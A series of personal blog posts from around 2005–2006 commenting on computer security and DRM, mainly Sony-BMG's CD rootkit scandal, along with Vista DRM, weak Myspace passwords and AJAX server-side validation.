"Peter Gutmann's report describes the pernicious DRM built into Vista and required by MS for approval of hardware and drivers," said INQ reader Brad Steffler, MD, who brought the report to our attention. "As a physician who uses PCs for image review before I perform surgery, this situation is intolerable. It is also intolerable for me as a medical school professor as I will have to switch to a MAC or a Linux PC. These draconian dicta just might kill the PC as we know it."
The actual report is here; I originally found it on [livejournal.com profile] cryptome.
mdlbear: (hacker glider)

The most common password these days is no longer "password". It's "password1". At least on Myspace. Who says users haven't learned anything. (The second and third most common are "abc123" and "myspace1" respectively.)

The same article notes that a recent study of corporate employees shows their passwords to be better than they were 15 years ago, but not as good as Myspace users.

mdlbear: the positively imaginary half of a cubic mandelbrot set (Default)
Good talk in the early afternoon sessions, with the fascinating title "The Madness of AJAX". Some good, scary demos. If you have an AJAX app, make sure you validate data *on the server!!* DO NOT trust the client-side code, even if you think you wrote it. Other client-side processes can change it.

Security?!

2006-05-17 02:05 am
mdlbear: the positively imaginary half of a cubic mandelbrot set (Default)
Security Absurdity.com > Security Absurdity; The Complete, Unquestionable, And Total Failure of Information Security.

They say if you drop a frog in a pot of boiling water, it will, of course, frantically try to scramble out. But if you place it gently in a pot of tepid water and turn the heat on low, it will float there quite complacently. As you turn up the heat, the frog will sink into a tranquil stupor and before long, with a smile on its face, it will unresistingly allow itself to be boiled to death. The security industry is much like that frog; completely and uncontrollably in disarray - yet we tolerate it since we are used to it.

It is time to admit what many security professionals already know: We, as security professionals, are drastically failing ourselves, our community and the people we are meant to protect. Too many of our security layers of defense are broken. Security professionals are enjoying a surge in business and growing salaries and that is why we tolerate the dismal situation we are facing. Yet it is our mandate, first and foremost, to protect.

(from [livejournal.com profile] spaf_cerias)

This article falls a little short of the mark, I think. You can avoid almost all security problems by following three simple rules: 1. Don't run Windows. 2. Don't read email in HTML, or any other format than plain text. 3. Don't trust any medium that can be easily tapped, which includes wireless and the Internet.

Much of what's called the "security industry" these days consists of people and companies making money off the fact that people don't follow these rules, rather than fixing the problem. At this point, merely educating the public will probably not be sufficient.

mdlbear: (sony)

on Boing Boing, as usual. One really must be grateful to Sony -- they've done more to discredit DRM than all the rest of us put together. But I'm still going to boycott them!

mdlbear: (sony)

I'm having trouble keeping up, but here's a second installment of BoingBoing's rootkit roundup. And for good measure, here's an analysis piece on Slyck News. Slyck appears to be a file-sharing news site.

Sony-BMG has managed to accomplish in 16 days what bloggers, the Electronic Frontier Foundation, writers, journalists, and niche sites have been working on for years. Sony-BMG has destroyed the music and movie industry's arguments against P2P, and brought mainstream attention and public distaste to the DRM debate.

mdlbear: the positively imaginary half of a cubic mandelbrot set (Default)

In the face of well-deserved adverse publicity over its DRM rootkit, Sony is offering a patch that reveals the hidden files. Of course, you still break your CD drivers if you try to remove it. Here's a reasonably well-balanced article (from the Washington Post).

In response to criticisms that intruders could take such advantage, First4Internet Ltd. -- the British company that developed the software -- will make available on its Web site a software patch that should remove its ability to hide files, chief executive Mathew Gilliat-Smith said.

Russinovich called the offer of a patch "backpedaling and damage control in the face of a public-relations nightmare" and emphasized that users who try to remove the files manually after applying the fix will still ruin their CD-Rom drives.

...

But according to Mikko Hypponen, director of research for Finnish antivirus company F-Secure Corp., users who want to remove the program may not do so directly, but must fill out a form on Sony's Web site, download additional software, wait for a phone call from a technical support specialist, and then download and install yet another program that removes the files.

I'd like to think that what we're seeing is the beginning of a popular revolt against the {music, movie} industry, that would end up with real reforms in the copyright and patent laws. But I don't believe it. Politicians listen to corporations with the money to hire lobbyists; common sense has nothing to do with it. But I do think that we're going to see a two-tiered system, with a small walled ghetto of high volume, high profit, corporate-published works, and a much larger web of freely-traded pro-am and amateur works under licences like the GPL and Creative Commons.

mdlbear: the positively imaginary half of a cubic mandelbrot set (Default)

F-Secure's description and blog posting. Note that, according to this posting, this is an independent confirmation of Mark Russinovich's analysis that I posted about yesterday and the day before.

(From [livejournal.com profile] autographedcat.)

mdlbear: portrait of me holding a guitar, by Kelly Freas (freas)

Brian Krebs. (From DocBug)

A comment on Krebs' blog post contains a link to Sony Music's feedback form: <www.sonymusic.com/about/feedback.cgi>; so I used it:

I was all set to buy another pair of Sony's excellent MDR 7509 professional headphones. Now that I've learned that Sony CDs install a Windows rootkit when you attempt to play them, I've decided to look for an alternative, from a company that does not illegally install unwanted software on its customers' computers.

And you can forget about selling me music. As an independent singer-songwriter who believes in fair use and the power of word-of-mouth advertising, I will continue to buy my CDs from my fellow musicians, and not from soulless, evil companies like Sony.

mdlbear: the positively imaginary half of a cubic mandelbrot set (Default)

Slashdot and BoingBoing both point to this article dissecting the rootkit that Sony installs in the name of DRM on their recent audio CDs. It hides registry entries and processes, and hooks into drivers and system calls, and creates a hidden directory. It's a rootkit -- one of the nastiest forms of malware out there.

It'll be a cold day in Hell the next time I buy a Sony product. Too bad for them; I was thinking of getting another pair of headphones. Anybody know of something roughly equivalent to the Sony MDR 7509's?

Most Popular Tags

Syndicate

RSS Atom

Style Credit

Page generated 2019-02-20 02:59 am
Powered by Dreamwidth Studios